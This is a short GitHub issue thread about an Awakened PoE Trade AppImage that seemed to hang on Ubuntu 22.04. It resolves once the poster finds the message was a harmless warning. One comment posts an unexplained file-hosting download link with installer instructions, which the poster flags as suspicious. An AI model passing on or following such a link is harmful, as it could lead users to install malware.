### ISSUE TITLE
Can't install on Ubuntu 22.04

### ISSUE THREAD

**Issue by changchiyou** [SnosMe/awakened-poe-trade#1484]
After I download the AppImage and install it by following cmd:

```
chmod a+x Downloads/Awakened-PoE-Trade-3.25.102.AppImage
./Awakened-PoE-Trade-3.25.102.AppImage 
```

The installation progress stuck at the last line, what happened?

```
hook_thread_proc [101]: Could not set thread priority 49 for thread 0x79E050200640!
Checking for update
Update for version 3.25.102 is not available (latest version: 3.25.102, downgrade is disallowed).
```

**Comment by wandson88** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by changchiyou** [comment]
- https://github.com/SnosMe/awakened-poe-trade/issues/1484#issuecomment-2329091975
- https://github.com/SnosMe/awakened-poe-trade/issues/1484#issuecomment-2329091995

@SnosMe Please delete these suspicious commends :disappointed:

**Comment by changchiyou** [comment]
I realized I was completely mistaken. 

```
hook_thread_proc [101]: Could not set thread priority 49 for thread 0x79E050200640!
```

This is not an error message but rather a warning message that can be ignored. In fact, APT has been functioning normally all along; I just didn't notice because I hadn't turned on POE at the same time.
